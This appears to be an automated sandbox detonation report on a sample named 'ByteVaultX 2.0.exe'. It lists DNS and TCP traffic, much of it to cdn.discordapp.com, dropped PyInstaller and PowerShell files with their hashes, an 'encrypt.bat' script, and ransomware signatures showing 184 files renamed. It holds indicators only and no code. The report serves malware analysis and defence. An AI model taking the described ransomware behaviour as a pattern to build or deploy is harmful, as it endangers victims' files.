US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 2.17.251.4:443 bzib.nelreports.net tcp
BE 23.55.97.181:443 www.microsoft.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 51.11.108.188:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.11.108.188:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 4.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 188.108.11.51.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 64.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 66.229.138.52.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI46602\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI46602\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI46602\base_library.zip

MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

C:\Users\Admin\AppData\Local\Temp\_MEI46602\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI46602\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI46602\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI46602\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI46602\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI46602\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI46602\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI46602\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI46602\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI46602\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI46602\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI46602\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

C:\Users\Admin\AppData\Local\Temp\_MEI46602\cryptography\hazmat\bindings\_rust.pyd

MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

memory/1356-198-0x00007FFFA91C3000-0x00007FFFA91C5000-memory.dmp

memory/1356-199-0x00000260BBFE0000-0x00000260BC002000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y0olgxdj.ojf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1356-209-0x00007FFFA91C0000-0x00007FFFA9C81000-memory.dmp

memory/1356-210-0x00007FFFA91C0000-0x00007FFFA9C81000-memory.dmp

memory/1356-211-0x00007FFFA91C0000-0x00007FFFA9C81000-memory.dmp

memory/1356-214-0x00007FFFA91C0000-0x00007FFFA9C81000-memory.dmp

C:\Encrypt\encrypt.bat

MD5 59094544993f4727a85d62f55ea66f17
SHA1 39a125f1d71b596e57d14c2865626b95825f1053
SHA256 9b70930727653b6b647554cf3bd508fe9ba4981aaebcbeed91f7270653d679ca
SHA512 48f15e70f9e800533e3869b527d4cae504ef04a2fea38c9aa1f2bb541fd1fa559979a6b7e802da067b52a98202387fd5b9023dfa09f85d67c8c7b759f73a4774

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb1ad317bd25b55b2bbdce8a28a74a94
SHA1 98a3978be4d10d62e7411946474579ee5bdc5ea6
SHA256 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512 d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2117cf9865e42aacdfc8925e05fe4031
SHA1 f89be0d1409b864d85da2479dbcf4382b9a8e888
SHA256 97ed8e4e2f74329c27b63cc9b72b4af1cdc51c4dc014725b80b51da93b91192d
SHA512 83e12e1658ae4bf6b89edaa04e3e81492b9d25990745ab429ebf861915826512213ac9accc1323a5f3d71a821c07ff9010aa8772eb6b0bf6a93649b3ca112166

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6eeae2b8c20a613e264c31e93319fa3
SHA1 1d35c414ff9078d31fe36f243143f3a340872953
SHA256 1fff11c3a0217aa5cefc4bff221979d45517869a1830ed69f99e6b7d68f6cbb3
SHA512 7895e4a1cc49313cde6baf8642e42466f8813b79f140368ac065e484b121c25ba7d80d9da2b75b7079a3712632e8a79b54bf4b68a1067b6555a836b71b321312

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3072fa0040b347c3941144486bf30c6f
SHA1 e6dc84a5bd882198583653592f17af1bf8cbfc68
SHA256 da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
SHA512 62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da5c82b0e070047f7377042d08093ff4
SHA1 89d05987cd60828cca516c5c40c18935c35e8bd3
SHA256 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA512 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fd98baf5a9c30d41317663898985593b
SHA1 ea300b99f723d2429d75a6c40e0838bf60f17aad
SHA256 9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96
SHA512 bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4165c906a376e655973cef247b5128f1
SHA1 c6299b6ab8b2db841900de376e9c4d676d61131e
SHA256 fb0b3c822d300abbb892e6f218d6b4b62b80bb26d9184d1f4c731600053a3fc4
SHA512 15783f2d3687388339c06423bd18c17a5704cd367bf1a1d08e436088984c0b5c52dc88d3b8455495a8051ba9f977aae34b69453e5ee252d928e74dcdebd4a11a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aeceee3981c528bdc5e1c635b65d223d
SHA1 de9939ed37edca6772f5cdd29f6a973b36b7d31b
SHA256 b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32
SHA512 df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6af79c42a91951991c1fd537ce8a2c34
SHA1 1ad1433abd1faf081e5e7acf8a24761513e7c8c5
SHA256 be158de8666d14623878a3e0a05208c409f2ba85195881c881a34a37bbde2a27
SHA512 cbf6eb61f1d1b0883a2572a9098b71372a001df4a6683865650a66c685d819816e2cb010948d315e3eb8cf2e8a3f550a832750e20ce9cbdefef34289c4a0cb3c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 abe66014fc8c29c33d2749827844ef12
SHA1 2fecfbe72ec1d376221cc2714475da3db6f90991
SHA256 4466c30f405579b147ef10bf00dfaffbd0b4e94674cf0d165c4026edd36d32fd
SHA512 f9b421eec79834a415d3ce1fede7b5249d3ed3efd920a169bad75de564752029c81966a95508c4b06b91dc37ee2f4c9b664636c4b0fd0d3d74fb662ae0465d06

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6b62626c9199f4688488fc54a3c44277
SHA1 2ad24e90c73e200c49eab2a74bf93b2c4e357686
SHA256 2c4d975787bde30963988a0a87f0b02e10c695ea795896f640169491a52884b8
SHA512 d8856a30fe27a90d4366850313fe1f8ff61733df37e0cc49d15e3b51336d1a786f25813f90e90e894fbe4fba6352a57523f7fd0a9724f4b075a511686777459a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e58749a7a1826f6ea62df1e2ef63a32b
SHA1 c0bca21658b8be4f37b71eec9578bfefa44f862d
SHA256 0e1f0e684adb40a5d0668df5fed007c9046137d7ae16a1f2f343b139d5f9bc93
SHA512 4cf45b2b11ab31e7f67fff286b29d50ed28cd6043091144c5c0f1348b5f5916ed7479cf985595e6f096b586ab93b4b5dce612f688049b8366a2dd91863e98b70

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 63aec5618613b4be6bd15b82345a971e
SHA1 cf3df18b2ed2b082a513dd53e55afb720cefe40e
SHA256 f67a667039290434cad954285ef9a93ab76b848158bb7fd1f698bd76b5bdd721
SHA512 a6c3b084ae6b41b2c3a9acb90a6f52a5acaff3bd94927389aa6698d1f2713e494b2e8f190cbbc963d56d8d30d5644df0e5c616c1f081d19275e0803dc576a033

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 83685d101174171875b4a603a6c2a35c
SHA1 37be24f7c4525e17fa18dbd004186be3a9209017
SHA256 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dd0716df5ff6e2ed8bfa08e271d64dd8
SHA1 c342bbe936058ea27843d5dbe5eb434f926612f7
SHA256 15ea3598b422f0d7705405688a174b98789b623154d4ccf3f3148f7c10bafdd8
SHA512 7e6dc8f9ad269ca3969e7b1284399f16f59559d5a4232537147fb7edcba86932474eff26921c09472894d55ee045dd3e371dcfce65d358785166742582e0b8a4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7a2a96e13462c26cc9a2b0f1922d595a
SHA1 70e2adf4f820220f2e1d5b84a8c2f88857da10c4
SHA256 665e9e6b2fe31ff680ffdc4fd111028ae663d2a9d99c3ef5aa4158b9f88fb73b
SHA512 3db783999d0322e17decb6d6b090684467be1e933bd68dc17a62ca4b0c632e3464a23448c1c97e34d340d21223baa51846e066323f7ec47b955f1f7dc1dbe948

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6c0738fb2f130eb126252b38231ce3a4
SHA1 e2a65af0e33054858ce98bb7e397628d1a376316
SHA256 fd147b5a400e46e3fc0c05940884051061a659e78fe9b44ef9445284612131c7
SHA512 d0c039fa918977c6b3a4a06cc28cd45005d2e8a75e76f88d4e909d765e2b5924ec4cdfaff9ba7f7a69517fe0c7e39dc53c2f1a96f0927bd5ec2ed65b897ee238

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0e402a30b76022fccda94877c8cec4ee
SHA1 c413572472bfd733f3a6b8e3b69bd6485bf5fd22
SHA256 bac7451c4c04410c5a7d2e301e585277c1f69f6231850e52fd03ab3cd5c3b840
SHA512 90f416b43597a5b6f08eacd31fee6062b7a5cfe761cecce371c5b02c09c27c0482078adf3978671382abe1215ba53683a9945c583e56f63933e85b5354daa695

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bbc2b43d5e574fe7d193c6fc0eb7302c
SHA1 f22683b94ad593fd0513fef37df1fb5d0880cc22
SHA256 0efa2469ae0b02af024fd0e2828ccab085eaefef3736b3bda0ba631e3a45aa48
SHA512 287449b168297a5176b26777f2f5ca3284d967b93274db8b3029d130049073560a10e418607f670d08194193aa91fc9cd174717e7c1d051b09c23857fe3ab9d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5f9246b90bb643f1f6e32b638684da6e
SHA1 7c3d0a783c969d3a55eb92669bd9183f0b7dd603
SHA256 4ac95bd39341c98026937c0fc18142ed1d3f034f5073c9b03defdfa1c9be8bad
SHA512 57285dcf7c0e0a0f477e3f6ff1aca9223785c221d899a74c02aa8f82619d1d1914562682a85dd4b4fadb25c95d98f016d76bb3c8049d38d8de8fa14db194110d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 22310ad6749d8cc38284aa616efcd100
SHA1 440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA256 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA512 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba169f4dcbbf147fe78ef0061a95e83b
SHA1 92a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA256 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA512 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbb904188a321994906abe152659c567
SHA1 1a131923372bab101ca002c35544858fe3e2370c
SHA256 ccd43cc5dbdd2dc786bdd89460c11ea5f55b4e8389b98e0bcd6400f614fe9d04
SHA512 37cbba09369d94ce3d9852503c50a1cdc14a5646d8b4fdeca9bffd3d9284d8e0ceb2801ba458fdddf762f1a4058c5781d0a2f95452d3f7302e42abc5920238ef

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-25 23:21

Reported

2024-05-25 23:39

Platform

win11-20240508-en

Max time kernel

1050s

Max time network

1048s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (184) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
